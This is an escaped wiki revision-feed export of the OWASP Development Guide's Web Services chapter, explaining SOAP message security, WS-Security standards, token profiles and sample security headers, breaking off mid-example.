As could be deduced from the previous sections, Web Service security standards are fairly complex, and have very steep learning curve associated with them. Most of the current products, dealing with Web Service security, suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all different policies, identities, keys, and protocols takes a lot of time and good understanding of the involved technologies, as most of the times errors that end users are seeing have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standard’s bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying the administrators with ready for deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59466</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59466"/>
				<updated>2009-04-26T11:46:11Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Security header’s structure */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address common issues. Due to the space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Lets assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in the clear-text form, at least – temporarily. Storing the transmitted information at the intermediate aggravates the problem or destination servers in log files (where it can be browsed by anybody) and local caches.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that the most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such approach, and make conscious trade-offs at the design time, whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherited risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. Usual ways to avoid sending sensitive credentials are using cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” whereas server or clients' clocks drift too much, preventing timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may be expiring while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “whether I trust the caller,” “whether it created this message.” Assuming that the caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). This may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually some mechanisms like checksum applied to ensure packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably tracked back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret key-encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – the traditional HTTP firewalls do not help at stopping attacks at the Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and make intelligent decision about passing SOAP messages to their destination. The reader would need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required from the audits, is reconstructing the chain of events that led to a certain problem. Normally, this would be achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as the WS are concerned, such level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Current version is 1.0, and the work on the version 1.1 of the specification is under way and is expected to be finishing in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols that are being developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standards are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens, passed in WSS messages, and ways of attaching them to the message may vary substantially. At the high level the WSS standard defines three types of security tokens, attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile document, which defines additional tokens' attributes and elements, needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, whereas each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as: authenticity, integrity, freshness, and to initiate decryption of any encrypted message parts. This concept is a stark contrast to the traditional channel security, which methodically applies pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included into SOAP envelope and describes all high-level blocks, which must be present in a valid security header. Profile documents have the dual task of extending definitions for the token types they are dealing with, providing additional attributes, elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt; which specifies, how X.509 certificates may be passed in the BinarySecurityToken, specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1), or roles (for SOAP 1.2). Their contents may also be referring to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. WSS security header itself has a loose structure, as the specification itself does not require any elements to be present – so, the minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information, which is going to help securing the message. It means including one or more security tokens (see 0) with references, XML Signature, and XML Encryption elements, if the message is signed and/or encrypted. So, a typical header will look more like the following picture: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... ''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
